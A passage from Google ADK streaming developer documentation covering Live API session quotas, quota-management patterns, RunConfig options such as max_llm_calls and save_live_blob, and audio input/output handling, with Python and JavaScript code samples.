graceful session transitions for conversations exceeding session limits ## Concurrent Live API Sessions and Quota Management **Problem:** Production voice applications typically serve multiple users simultaneously, each requiring their own Live API session. However, both Gemini Live API and Vertex AI Live API impose strict concurrent session limits that vary by platform and pricing tier. Without proper quota planning and session management, applications can hit these limits quickly, causing connection failures for new users or degraded service quality during peak usage. **Solution:** Understand platform-specific quotas, design your architecture to stay within concurrent session limits, implement session pooling or queueing strategies when needed, and monitor quota usage proactively. ADK handles individual session lifecycle automatically, but developers must architect their applications to manage multiple concurrent users within quota constraints. ### Understanding Concurrent Live API Session Quotas Both platforms limit how many Live API sessions can run simultaneously, but the limits and mechanisms differ significantly: **Gemini Live API (Google AI Studio) - Tier-based quotas:** | **Tier** | **Concurrent Sessions** | **TPM (Tokens Per Minute)** | **Access** | | ------------- | ----------------------- | --------------------------- | ----------------- | | **Free Tier** | Limited\* | 1,000,000 | Free API key | | **Tier 1** | 50 | 4,000,000 | Pay-as-you-go | | **Tier 2** | 1,000 | 10,000,000 | Higher usage tier | | **Tier 3** | 1,000 | 10,000,000 | Higher usage tier | \*Free tier concurrent session limits are not explicitly documented but are significantly lower than paid tiers. 
Source [Gemini API Quotas](https://ai.google.dev/gemini-api/docs/quota) **Vertex AI Live API (Google Cloud) - Project-based quotas:** | **Resource Type** | **Limit** | **Scope** | | --------------------------------------------- | -------------- | ----------------------- | | **Concurrent live bidirectional connections** | 10 per minute | Per project, per region | | **Maximum concurrent sessions** | Up to 1,000 | Per project | | **Session creation/deletion/update** | 100 per minute | Per project, per region | Source [Vertex AI Live API](https://cloud.google.com/vertex-ai/generative-ai/docs/live-api) | [Vertex AI Quotas](https://cloud.google.com/vertex-ai/generative-ai/docs/quotas) **Requesting a quota increase:** To request an increase for Live API concurrent sessions, navigate to the [Quotas page](https://console.cloud.google.com/iam-admin/quotas) in the Google Cloud Console. Filter for the quota named **"Bidi generate content concurrent requests"** to find quota values for each project, region and base model, and submit a quota increase request. You'll need the Quota Administrator role (`roles/servicemanagement.quotaAdmin`) to make the request. See [View and manage quotas](https://cloud.google.com/docs/quotas/view-manage) for detailed instructions. **Key differences:** 1. **Gemini Live API**: Concurrent session limits scale dramatically with API tier (50 → 1,000 sessions). Best for applications with unpredictable or rapidly scaling user bases willing to pay for higher tiers. 1. **Vertex AI Live API**: Rate-limited by connection establishment rate (10/min) but supports up to 1,000 total concurrent sessions. Best for enterprise applications with gradual scaling patterns and existing Google Cloud infrastructure. Additionally, you can request quota increases to prepare for production deployments with higher concurrency requirements. 
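If your application runs on Vertex AI and could open connections in bursts, one way to stay within the connection establishment rate quoted above (10 per minute) is a sliding-window limiter in front of session startup. The class below is a minimal sketch and not an ADK feature: `ConnectionRateLimiter` is a hypothetical helper, and the default of 10 per 60 seconds simply mirrors the table value.

```python
import time
from collections import deque
from typing import Callable, Deque


class ConnectionRateLimiter:
    """Sliding-window limiter for new Live API connections (hypothetical helper)."""

    def __init__(
        self,
        max_per_window: int = 10,
        window_seconds: float = 60.0,
        clock: Callable[[], float] = time.monotonic,
    ) -> None:
        self._max = max_per_window
        self._window = window_seconds
        self._clock = clock  # injectable so the limiter can be tested without sleeping
        self._starts: Deque[float] = deque()

    def try_acquire(self) -> bool:
        """Return True if a new connection may be started right now."""
        now = self._clock()
        # Drop start times that have aged out of the window.
        while self._starts and now - self._starts[0] >= self._window:
            self._starts.popleft()
        if len(self._starts) >= self._max:
            return False
        self._starts.append(now)
        return True


# Demonstration with a fake clock: 11 attempts at t=0, then one at t=60.
fake_now = [0.0]
limiter = ConnectionRateLimiter(clock=lambda: fake_now[0])
results = [limiter.try_acquire() for _ in range(11)]
fake_now[0] = 60.0
after_window = limiter.try_acquire()
print(results.count(True), results[-1], after_window)  # 10 False True
```

In an application you would call `try_acquire()` before starting a new streaming session and delay or queue the user when it returns `False`.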
### Architectural Patterns for Managing Quotas

Once you understand your concurrent session quotas, the next challenge is architecting your application to operate effectively within those limits. The right approach depends on your expected user concurrency, scaling requirements, and tolerance for queueing. This section presents two architectural patterns, from simple direct mapping for low-concurrency applications to session pooling with queueing for applications that may exceed quota limits during peak usage. Choose the pattern that matches your current scale and design it to evolve as your user base grows.

**Choosing the Right Architecture:**

```text
             Start: Designing Quota Management
                          |
                          v
               Expected Concurrent Users?
                 /                    \
       < Quota Limit           > Quota Limit or Unpredictable
            |                              |
            v                              v
 Pattern 1: Direct Mapping      Pattern 2: Session Pooling
 - Simple 1:1 mapping           - Queue waiting users
 - No quota logic               - Graceful degradation
 - Fast development             - Peak handling
            |                              |
            v                              v
       Good for:                      Good for:
 - Prototypes                   - Production at scale
 - Small teams                  - Unpredictable load
 - Controlled users             - Public applications
```

**Quick Decision Guide:**

| Factor                        | Direct Mapping             | Session Pooling         |
| ----------------------------- | -------------------------- | ----------------------- |
| **Expected users**            | Always < quota             | May exceed quota        |
| **User experience**           | Always instant             | May wait during peaks   |
| **Implementation complexity** | Low                        | Medium                  |
| **Operational overhead**      | None                       | Monitor queue depth     |
| **Best for**                  | Prototypes, internal tools | Production, public apps |

#### Pattern 1: Direct Mapping (Simple Applications)

For small-scale applications where concurrent users will never exceed quota limits, create a dedicated Live API session for each connected user with a simple 1:1 mapping:

1. **When a user connects:** Immediately start a `run_live()` session for them
1. **When they disconnect:** The session ends
1. **No quota management logic:** Assumes your total concurrent users will always stay below your quota limits

This is the simplest possible architecture and works well for prototypes, development environments, and small-scale applications with predictable user loads.

#### Pattern 2: Session Pooling with Queueing

For applications that may exceed concurrent session limits during peak usage, track the number of active Live API sessions and enforce your quota limit at the application level:

1. **When a new user connects:** Check if you have available session slots
1. **If slots are available:** Start a session immediately
1. **If you've reached your quota limit:**
   1. Place the user in a waiting queue
   1. Notify them they're waiting for an available slot
1. **As sessions end:** Automatically process the queue to start sessions for waiting users

This provides graceful degradation: users wait briefly during peak times rather than experiencing hard connection failures.

## Miscellaneous Controls

ADK provides additional RunConfig options to control session behavior, manage costs, and persist audio data for debugging and compliance purposes.

```python
from google.adk.agents.run_config import RunConfig

run_config = RunConfig(
    # Limit total LLM calls per invocation
    max_llm_calls=500,  # Default: 500 (prevents runaway loops)
                        # 0 or negative = unlimited (use with caution)

    # Save audio/video artifacts for debugging/compliance
    save_live_blob=True,  # Default: False

    # Attach custom metadata to events
    custom_metadata={"user_tier": "premium", "session_type": "support"},  # Default: None

    # Enable compositional function calling (experimental)
    support_cfc=True,  # Default: False (Gemini 2.x models only)
)
```

### max_llm_calls

This parameter caps the total number of LLM calls allowed per invocation context, providing protection against runaway costs and infinite agent loops.
**Limitation for BIDI Streaming:**

**The `max_llm_calls` limit does NOT apply to `run_live()` with `StreamingMode.BIDI`.** This parameter only protects SSE streaming mode and `run_async()` flows. If you're building bidirectional streaming applications (the focus of this guide), you will NOT get automatic cost protection from this parameter.

**For Live streaming sessions**, implement your own safeguards:

- Session duration limits
- Turn count tracking
- Custom cost monitoring by tracking token usage in model turn events (see [Part 3: Event Types and Handling](https://google.github.io/adk-docs/streaming/dev-guide/part3/#event-types-and-handling))
- Application-level circuit breakers

### save_live_blob

This parameter controls whether audio and video streams are persisted to ADK's session and artifact services for debugging, compliance, and quality assurance purposes.

**Migration Note: `save_live_audio` Deprecated**

**If you're using `save_live_audio`:** This parameter has been deprecated in favor of `save_live_blob`. ADK will automatically migrate `save_live_audio=True` to `save_live_blob=True` with a deprecation warning, but this compatibility layer will be removed in a future release. Update your code to use `save_live_blob` instead.

Currently, **only audio is persisted** by ADK's implementation.

When enabled, ADK persists audio streams to:

- **[Session service](https://google.github.io/adk-docs/sessions/)**: Conversation history includes audio references
- **[Artifact service](https://google.github.io/adk-docs/artifacts/)**: Audio files stored with unique IDs

**Use cases:**

- **Debugging**: Voice interaction issues, assistant behavior analysis
- **Compliance**: Audit trails for regulated industries (healthcare, financial services)
- **Quality Assurance**: Monitoring conversation quality, identifying issues
- **Training Data**: Collecting data for model improvement
- **Development/Testing**: Testing environments and cost-sensitive deployments

**Storage considerations:**

Enabling `save_live_blob=True` has significant storage implications:

- **Audio file sizes**: At 16kHz PCM, audio input generates ~1.92 MB per minute
- **Session storage**: Audio is stored in both session service and artifact service
- **Retention policy**: Check your artifact service configuration for retention periods
- **Cost impact**: Storage costs can accumulate quickly for high-volume voice applications

**Best practices:**

- Enable only when needed (debugging, compliance, training)
- Implement retention policies to auto-delete old audio artifacts
- Consider sampling (e.g., save 10% of sessions for quality monitoring)
- Use compression if supported by your artifact service

### custom_metadata

This parameter allows you to attach arbitrary key-value metadata to events generated during the current invocation. The metadata is stored in the `Event.custom_metadata` field and persisted to session storage, enabling you to tag events with application-specific context for analytics, debugging, routing, or compliance tracking.
**Configuration:**

```python
from google.adk.agents.run_config import RunConfig

# Attach metadata to all events in this invocation
run_config = RunConfig(
    custom_metadata={
        "user_tier": "premium",
        "session_type": "customer_support",
        "campaign_id": "promo_2025",
        "ab_test_variant": "variant_b"
    }
)
```

**How it works:**

When you provide `custom_metadata` in RunConfig:

1. **Metadata attachment**: The dictionary is attached to every `Event` generated during the invocation
1. **Session persistence**: Events with metadata are stored in the session service (database, Vertex AI, or in-memory)
1. **Event access**: Retrieve metadata from any event via `event.custom_metadata`
1. **A2A integration**: For Agent-to-Agent (A2A) communication, ADK automatically propagates A2A request metadata to this field

**Type specification:**

```python
custom_metadata: Optional[dict[str, Any]] = None
```

The metadata is a flexible dictionary accepting any JSON-serializable values (strings, numbers, booleans, nested objects, arrays).
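
Because the values must be JSON-serializable, it can help to check a metadata dictionary before handing it to `RunConfig`. The following is a minimal sketch using only the standard library. The helper `validate_custom_metadata` and its `max_bytes` budget are hypothetical (ADK does not define them), and the 4096-byte default is an arbitrary illustration of keeping metadata small.

```python
import json
from typing import Any


def validate_custom_metadata(metadata: dict[str, Any], max_bytes: int = 4096) -> str:
    """Return the JSON encoding of `metadata`, or raise ValueError.

    Hypothetical pre-flight check: string keys, JSON-serializable values,
    and an application-chosen size budget (not an ADK limit).
    """
    if not all(isinstance(key, str) for key in metadata):
        raise ValueError("metadata keys must be strings")
    try:
        # allow_nan=False rejects NaN/Infinity, which are not valid JSON.
        encoded = json.dumps(metadata, allow_nan=False)
    except (TypeError, ValueError) as exc:
        raise ValueError(f"metadata is not JSON-serializable: {exc}") from exc
    if len(encoded.encode("utf-8")) > max_bytes:
        raise ValueError(f"metadata exceeds {max_bytes} bytes when encoded")
    return encoded


# Passes: nested objects and arrays are fine.
validate_custom_metadata({"user_tier": "premium", "flags": ["beta", "voice"]})

# Fails: a set has no JSON representation.
try:
    validate_custom_metadata({"tags": {"a", "b"}})
except ValueError as err:
    print(f"rejected: {err}")
```

Running a check like this at the application boundary surfaces bad metadata early instead of at session persistence time.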
**Use cases:**

- **User segmentation**: Tag events with user tier, subscription level, or cohort information
- **Session classification**: Label sessions by type (support, sales, onboarding) for analytics
- **Campaign tracking**: Associate events with marketing campaigns or experiments
- **A/B testing**: Track which variant of your application generated the event
- **Compliance**: Attach jurisdiction, consent flags, or data retention policies
- **Debugging**: Add trace IDs, feature flags, or environment identifiers
- **Analytics**: Store custom dimensions for downstream analysis

**Example - Retrieving metadata from events:**

```python
# Assumes `runner` and `live_request_queue` are already set up as in the other examples
async for event in runner.run_live(
    user_id="user_123",
    session_id="session_456",
    live_request_queue=live_request_queue,
    run_config=RunConfig(
        custom_metadata={"user_id": "user_123", "experiment": "new_ui"}
    ),
):
    if event.custom_metadata:
        print(f"User: {event.custom_metadata.get('user_id')}")
        print(f"Experiment: {event.custom_metadata.get('experiment')}")
```

**Agent-to-Agent (A2A) integration:**

When using `RemoteA2AAgent`, ADK automatically extracts metadata from A2A requests and populates `custom_metadata`:

```python
# A2A request metadata is automatically mapped to custom_metadata
# Source: a2a/converters/request_converter.py
custom_metadata = {
    "a2a_metadata": {
        # Original A2A request metadata appears here
    }
}
```

This lets metadata propagate across agent boundaries in multi-agent architectures.
**Best practices:**

- Use consistent key naming conventions across your application
- Avoid storing sensitive data (PII, credentials) in metadata; use encryption if necessary
- Keep metadata size reasonable to minimize storage overhead
- Document your metadata schema for team consistency
- Consider using metadata for session filtering and search in production debugging

### support_cfc (Experimental)

This parameter enables Compositional Function Calling (CFC), allowing the model to orchestrate multiple tools in sophisticated patterns: calling tools in parallel, chaining outputs as inputs to other tools, or conditionally executing tools based on intermediate results.

**⚠️ Experimental Feature:** CFC support is experimental and subject to change.

**Critical behavior:** When `support_cfc=True`, ADK **always uses the Live API** (WebSocket) internally, regardless of the `streaming_mode` setting. This is because only the Live API backend supports CFC capabilities.

```python
from google.adk.agents.run_config import RunConfig, StreamingMode

# Even with SSE mode, ADK routes through Live API when CFC is enabled
run_config = RunConfig(
    support_cfc=True,
    streaming_mode=StreamingMode.SSE,  # ADK uses Live API internally
)
```

**Model requirements:**

ADK validates CFC compatibility at session initialization and will raise an error if the model is unsupported:

- ✅ **Supported**: `gemini-2.x` models (e.g., `gemini-2.5-flash-native-audio-preview-12-2025`)
- ❌ **Not supported**: `gemini-1.5-x` models
- **Validation**: ADK checks that the model name starts with `gemini-2` when `support_cfc=True` ([`runners.py:1322-1328`](https://github.com/google/adk-python/blob/fd2c0f556b786417a9f6add744827b07e7a06b7d/src/google/adk/runners.py#L1361-L1367))
- **Code executor**: ADK automatically injects `BuiltInCodeExecutor` when CFC is enabled for safe parallel tool execution

**CFC capabilities:**

- **Parallel execution**: Call multiple independent tools simultaneously (e.g., fetch weather for multiple cities at once)
- **Function chaining**: Use one tool's output as input to another (e.g., `get_location()` → `get_weather(location)`)
- **Conditional execution**: Execute tools based on intermediate results from prior tool calls

**Use cases:**

CFC is designed for complex, multi-step workflows that benefit from intelligent tool orchestration:

- Data aggregation from multiple APIs simultaneously
- Multi-step analysis pipelines where tools feed into each other
- Complex research tasks requiring conditional exploration
- Any scenario needing sophisticated tool coordination beyond sequential execution

**For bidirectional streaming applications:** While CFC works with BIDI mode, it's primarily optimized for text-based tool orchestration. For real-time audio/video interactions (the focus of this guide), standard function calling typically provides better performance and simpler implementation.

**Learn more:**

- [Gemini Function Calling Guide](https://ai.google.dev/gemini-api/docs/function-calling) - Official documentation on compositional and parallel function calling
- [ADK Parallel Functions Example](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/contributing/samples/parallel_functions/agent.py) - Working example with async tools
- [ADK Performance Guide](https://google.github.io/adk-docs/tools/performance/) - Best practices for parallel-ready tools

## Summary

In this part, you learned how RunConfig enables sophisticated control over ADK Bidi-streaming sessions through declarative configuration. We covered response modalities and their constraints, explored the differences between BIDI and SSE streaming modes, examined the relationship between ADK Sessions and Live API sessions, and learned how to manage session duration with session resumption and context window compression. You now understand how to handle concurrent session quotas, implement architectural patterns for quota management, and configure cost controls through `max_llm_calls` and audio persistence options.
With RunConfig mastery, you can build production-ready streaming applications that balance feature richness with operational constraints—enabling extended conversations, managing platform limits, controlling costs effectively, and monitoring resource consumption. ______________________________________________________________________ ← [Previous: Part 3: Event Handling with run_live()](https://google.github.io/adk-docs/streaming/dev-guide/part3/index.md) | [Next: Part 5: How to Use Audio, Image and Video](https://google.github.io/adk-docs/streaming/dev-guide/part5/index.md) → # Part 5: How to Use Audio, Image and Video This section covers audio, image and video capabilities in ADK's Live API integration, including supported models, audio model architectures, specifications, and best practices for implementing voice and video features. ## How to Use Audio Live API's audio capabilities enable natural voice conversations with sub-second latency through bidirectional audio streaming. This section covers how to send audio input to the model and receive audio responses, including format requirements, streaming best practices, and client-side implementation patterns. ### Sending Audio Input **Audio Format Requirements:** Before calling `send_realtime()`, ensure your audio data is already in the correct format: - **Format**: 16-bit PCM (signed integer) - **Sample Rate**: 16,000 Hz (16kHz) - **Channels**: Mono (single channel) ADK does not perform audio format conversion. Sending audio in incorrect formats will result in poor quality or errors. Demo implementation: [main.py:181-184](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L181-L184) ```python audio_blob = types.Blob( mime_type="audio/pcm;rate=16000", data=audio_data ) live_request_queue.send_realtime(audio_blob) ``` #### Best Practices for Sending Audio Input 1. **Chunked Streaming**: Send audio in small chunks for low latency. 
Choose chunk size based on your latency requirements: - **Ultra-low latency** (real-time conversation): 10-20ms chunks (~320-640 bytes @ 16kHz) - **Balanced** (recommended): 50-100ms chunks (~1600-3200 bytes @ 16kHz) - **Lower overhead**: 100-200ms chunks (~3200-6400 bytes @ 16kHz) Use consistent chunk sizes throughout the session for optimal performance. Example: 100ms @ 16kHz = 16000 samples/sec × 0.1 sec × 2 bytes/sample = 3200 bytes. 1. **Prompt Forwarding**: ADK's `LiveRequestQueue` forwards each chunk promptly without coalescing or batching. Choose chunk sizes that meet your latency and bandwidth requirements. Don't wait for model responses before sending next chunks. 1. **Continuous Processing**: The model processes audio continuously, not turn-by-turn. With automatic VAD enabled (the default), just stream continuously and let the API detect speech. 1. **Activity Signals**: Use `send_activity_start()` / `send_activity_end()` only when you explicitly disable VAD for manual turn-taking control. VAD is enabled by default, so activity signals are not needed for most applications. #### Handling Audio Input at the Client In browser-based applications, capturing microphone audio and sending it to the server requires using the Web Audio API with AudioWorklet processors. The bidi-demo demonstrates how to capture microphone input, convert it to the required 16-bit PCM format at 16kHz, and stream it continuously to the WebSocket server. **Architecture:** 1. **Audio capture**: Use Web Audio API to access microphone with 16kHz sample rate 1. **Audio processing**: AudioWorklet processor captures audio frames in real-time 1. **Format conversion**: Convert Float32Array samples to 16-bit PCM 1. 
**WebSocket streaming**: Send PCM chunks to server via WebSocket Demo implementation: [audio-recorder.js:7-58](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/static/js/audio-recorder.js#L7-L58) ```javascript // Start audio recorder worklet export async function startAudioRecorderWorklet(audioRecorderHandler) { // Create an AudioContext with 16kHz sample rate // This matches the Live API's required input format (16-bit PCM @ 16kHz) const audioRecorderContext = new AudioContext({ sampleRate: 16000 }); // Load the AudioWorklet module that will process audio in real-time // AudioWorklet runs on a separate thread for low-latency, glitch-free audio processing const workletURL = new URL("./pcm-recorder-processor.js", import.meta.url); await audioRecorderContext.audioWorklet.addModule(workletURL); // Request access to the user's microphone // channelCount: 1 requests mono audio (single channel) as required by Live API micStream = await navigator.mediaDevices.getUserMedia({ audio: { channelCount: 1 } }); const source = audioRecorderContext.createMediaStreamSource(micStream); // Create an AudioWorkletNode that uses our custom PCM recorder processor // This node will capture audio frames and send them to our handler const audioRecorderNode = new AudioWorkletNode( audioRecorderContext, "pcm-recorder-processor" ); // Connect the microphone source to the worklet processor // The processor will receive audio frames and post them via port.postMessage source.connect(audioRecorderNode); audioRecorderNode.port.onmessage = (event) => { // Convert Float32Array to 16-bit PCM format required by Live API const pcmData = convertFloat32ToPCM(event.data); // Send the PCM data to the handler (which will forward to WebSocket) audioRecorderHandler(pcmData); }; return [audioRecorderNode, audioRecorderContext, micStream]; } // Convert Float32 samples to 16-bit PCM function convertFloat32ToPCM(inputData) { // Create an Int16Array of 
the same length const pcm16 = new Int16Array(inputData.length); for (let i = 0; i < inputData.length; i++) { // Web Audio API provides Float32 samples in range [-1.0, 1.0] // Multiply by 0x7fff (32767) to convert to 16-bit signed integer range [-32768, 32767] pcm16[i] = inputData[i] * 0x7fff; } // Return the underlying ArrayBuffer (binary data) for efficient transmission return pcm16.buffer; } ``` Demo implementation: [pcm-recorder-processor.js:1-18](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/static/js/pcm-recorder-processor.js#L1-L18) ```javascript // pcm-recorder-processor.js - AudioWorklet processor for capturing audio class PCMProcessor extends AudioWorkletProcessor { constructor() { super(); } process(inputs, outputs, parameters) { if (inputs.length > 0 && inputs[0].length > 0) { // Use the first channel (mono) const inputChannel = inputs[0][0]; // Copy the buffer to avoid issues with recycled memory const inputCopy = new Float32Array(inputChannel); this.port.postMessage(inputCopy); } return true; } } registerProcessor("pcm-recorder-processor", PCMProcessor); ``` Demo implementation: [app.js:977-986](https://github.com/google/adk-samples/blob/2f7b82f182659e0990bfb86f6ef400dd82633c07/python/agents/bidi-demo/app/static/js/app.js#L979-L988) ```javascript // Audio recorder handler - called for each audio chunk function audioRecorderHandler(pcmData) { if (websocket && websocket.readyState === WebSocket.OPEN && is_audio) { // Send audio as binary WebSocket frame (more efficient than base64 JSON) websocket.send(pcmData); console.log("[CLIENT TO AGENT] Sent audio chunk: %s bytes", pcmData.byteLength); } } ``` **Key Implementation Details:** 1. **16kHz Sample Rate**: The AudioContext must be created with `sampleRate: 16000` to match Live API requirements. Modern browsers support this rate. 1. **Mono Audio**: Request single-channel audio (`channelCount: 1`) since Live API expects mono input. 
This reduces bandwidth and processing overhead.
1. **AudioWorklet Processing**: AudioWorklet runs on a separate thread from the main JavaScript thread, ensuring low-latency, glitch-free audio processing without blocking the UI.
1. **Float32 to PCM16 Conversion**: Web Audio API provides audio as Float32Array values in range [-1.0, 1.0]. Multiply by 32767 (0x7fff) to convert to 16-bit signed integer PCM.
1. **Binary WebSocket Frames**: Send PCM data directly as ArrayBuffer via WebSocket binary frames instead of base64-encoding in JSON. This avoids base64's ~33% size overhead and eliminates encoding/decoding work.
1. **Continuous Streaming**: The AudioWorklet `process()` method is called automatically at regular intervals (typically 128 samples at a time, which is 8 ms of audio at 16kHz). This provides consistent chunk sizes for streaming.

This architecture ensures low-latency audio capture and efficient transmission to the server, which then forwards it to the ADK Live API via `LiveRequestQueue.send_realtime()`.

### Receiving Audio Output

When `response_modalities=["AUDIO"]` is configured, the model returns audio data in the event stream as `inline_data` parts.

**Audio Format Requirements:**

The model outputs audio in the following format:

- **Format**: 16-bit PCM (signed integer)
- **Sample Rate**: 24,000 Hz (24kHz) for native audio models
- **Channels**: Mono (single channel)
- **MIME Type**: `audio/pcm;rate=24000`

The audio data arrives as raw PCM bytes, ready for playback or further processing. No additional conversion is required unless you need a different sample rate or format.
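
Raw PCM carries no header, so most media players cannot open it directly. As one example of "further processing", the sketch below wraps PCM bytes in a WAV container using Python's standard `wave` module, assuming the output format listed above (16-bit, mono, 24kHz). The helper names `pcm_to_wav_bytes` and `pcm_duration_seconds` are hypothetical and not part of ADK.

```python
import io
import wave

BYTES_PER_SAMPLE = 2  # 16-bit PCM


def pcm_to_wav_bytes(pcm: bytes, sample_rate: int = 24000) -> bytes:
    """Wrap raw 16-bit mono PCM in a WAV container and return the file bytes."""
    buffer = io.BytesIO()
    with wave.open(buffer, "wb") as wav_file:
        wav_file.setnchannels(1)                 # mono
        wav_file.setsampwidth(BYTES_PER_SAMPLE)  # 16-bit samples
        wav_file.setframerate(sample_rate)
        wav_file.writeframes(pcm)
    return buffer.getvalue()


def pcm_duration_seconds(pcm: bytes, sample_rate: int = 24000) -> float:
    """Duration of a raw 16-bit mono PCM buffer in seconds."""
    return len(pcm) / (sample_rate * BYTES_PER_SAMPLE)


# One second of silence at the Live API output rate.
silence = b"\x00\x00" * 24000
wav_bytes = pcm_to_wav_bytes(silence)
print(len(wav_bytes), pcm_duration_seconds(silence))
```

For input audio captured at 16kHz, the same helpers apply with `sample_rate=16000`.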
**Receiving Audio Output:**

```python
from google.adk.agents.run_config import RunConfig, StreamingMode

# Configure for audio output
run_config = RunConfig(
    response_modalities=["AUDIO"],  # Required for audio responses
    streaming_mode=StreamingMode.BIDI
)

# Process audio output from the model
async for event in runner.run_live(
    user_id="user_123",
    session_id="session_456",
    live_request_queue=live_request_queue,
    run_config=run_config
):
    # Events may contain multiple parts (text, audio, etc.)
    if event.content and event.content.parts:
        for part in event.content.parts:
            # Audio data arrives as inline_data with audio/pcm MIME type
            if part.inline_data and part.inline_data.mime_type.startswith("audio/pcm"):
                # The data is already decoded to raw bytes (24kHz, 16-bit PCM, mono)
                audio_bytes = part.inline_data.data

                # Your logic to stream audio to client
                await stream_audio_to_client(audio_bytes)

                # Or save to file
                # with open("output.pcm", "ab") as f:
                #     f.write(audio_bytes)
```

**Automatic Base64 Decoding:** The Live API wire protocol transmits audio data as base64-encoded strings. The google.genai types system uses Pydantic's base64 serialization feature (`val_json_bytes='base64'`) to automatically decode base64 strings into bytes when deserializing API responses. When you access `part.inline_data.data`, you receive ready-to-use bytes, so no manual base64 decoding is needed.

#### Handling Audio Events at the Client

The bidi-demo uses a different architectural approach: instead of processing audio on the server, it forwards all events (including audio data) to the WebSocket client and handles audio playback in the browser. This pattern separates concerns: the server focuses on ADK event streaming while the client handles media playback using Web Audio API.
Demo implementation: [main.py:225-233](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L225-L233) ```python # The bidi-demo forwards all events (including audio) to the WebSocket client async for event in runner.run_live( user_id=user_id, session_id=session_id, live_request_queue=live_request_queue, run_config=run_config ): event_json = event.model_dump_json(exclude_none=True, by_alias=True) await websocket.send_text(event_json) ``` **Demo Implementation (Client - JavaScript):** The client-side implementation involves three components: WebSocket message handling, audio player setup with AudioWorklet, and the AudioWorklet processor itself. Demo implementation: [app.js:638-688](https://github.com/google/adk-samples/blob/2f7b82f182659e0990bfb86f6ef400dd82633c07/python/agents/bidi-demo/app/static/js/app.js#L640-L690) ```javascript // 1. WebSocket Message Handler // Handle content events (text or audio) if (adkEvent.content && adkEvent.content.parts) { const parts = adkEvent.content.parts; for (const part of parts) { // Handle inline data (audio) if (part.inlineData) { const mimeType = part.inlineData.mimeType; const data = part.inlineData.data; // Check if this is audio PCM data and the audio player is ready if (mimeType && mimeType.startsWith("audio/pcm") && audioPlayerNode) { // Decode base64 to ArrayBuffer and send to AudioWorklet for playback audioPlayerNode.port.postMessage(base64ToArray(data)); } } } } // Decode base64 audio data to ArrayBuffer function base64ToArray(base64) { // Convert base64url to standard base64 (RFC 4648 compliance) // base64url uses '-' and '_' instead of '+' and '/', which are URL-safe let standardBase64 = base64.replace(/-/g, '+').replace(/_/g, '/'); // Add padding '=' characters if needed // Base64 strings must be multiples of 4 characters while (standardBase64.length % 4) { standardBase64 += '='; } // Decode base64 string to binary string using browser API const 
binaryString = window.atob(standardBase64); const len = binaryString.length; const bytes = new Uint8Array(len); // Convert each character code (0-255) to a byte for (let i = 0; i < len; i++) { bytes[i] = binaryString.charCodeAt(i); } // Return the underlying ArrayBuffer (binary data) return bytes.buffer; } ``` Demo implementation: [audio-player.js:5-24](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/static/js/audio-player.js#L5-L24) ```javascript // 2. Audio Player Setup // Start audio player worklet export async function startAudioPlayerWorklet() { // Create an AudioContext with 24kHz sample rate // This matches the Live API's output audio format (16-bit PCM @ 24kHz) // Note: Different from input rate (16kHz) - Live API outputs at higher quality const audioContext = new AudioContext({ sampleRate: 24000 }); // Load the AudioWorklet module that will handle audio playback // AudioWorklet runs on audio rendering thread for smooth, low-latency playback const workletURL = new URL('./pcm-player-processor.js', import.meta.url); await audioContext.audioWorklet.addModule(workletURL); // Create an AudioWorkletNode using our custom PCM player processor // This node will receive audio data via postMessage and play it through speakers const audioPlayerNode = new AudioWorkletNode(audioContext, 'pcm-player-processor'); // Connect the player node to the audio destination (speakers/headphones) // This establishes the audio graph: AudioWorklet → AudioContext.destination audioPlayerNode.connect(audioContext.destination); return [audioPlayerNode, audioContext]; } ``` Demo implementation: [pcm-player-processor.js:5-76](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/static/js/pcm-player-processor.js#L5-L76) ```javascript // 3. 
AudioWorklet Processor (Ring Buffer) // AudioWorklet processor that buffers and plays PCM audio class PCMPlayerProcessor extends AudioWorkletProcessor { constructor() { super(); // Initialize ring buffer (24kHz x 180 seconds = ~4.3 million samples) // Ring buffer absorbs network jitter and ensures smooth playback this.bufferSize = 24000 * 180; this.buffer = new Float32Array(this.bufferSize); this.writeIndex = 0; // Where we write new audio data this.readIndex = 0; // Where we read for playback // Handle incoming messages from main thread this.port.onmessage = (event) => { // Reset buffer on interruption (e.g., user interrupts model response) if (event.data.command === 'endOfAudio') { this.readIndex = this.writeIndex; // Clear the buffer by jumping read to write position return; } // Decode Int16 array from incoming ArrayBuffer // The Live API sends 16-bit PCM audio data const int16Samples = new Int16Array(event.data); // Add audio data to ring buffer for playback this._enqueue(int16Samples); }; } // Push incoming Int16 data into ring buffer _enqueue(int16Samples) { for (let i = 0; i < int16Samples.length; i++) { // Convert 16-bit integer to float in [-1.0, 1.0] required by Web Audio API // Divide by 32768 (max positive value for signed 16-bit int) const floatVal = int16Samples[i] / 32768; // Store in ring buffer at current write position this.buffer[this.writeIndex] = floatVal; // Move write index forward, wrapping around at buffer end (circular buffer) this.writeIndex = (this.writeIndex + 1) % this.bufferSize; // Overflow handling: if write catches up to read, move read forward // This overwrites oldest unplayed samples (rare, only under extreme network delay) if (this.writeIndex === this.readIndex) { this.readIndex = (this.readIndex + 1) % this.bufferSize; } } } // Called by Web Audio system automatically ~128 samples at a time // This runs on the audio rendering thread for precise timing process(inputs, outputs, parameters) { const output = outputs[0]; const 
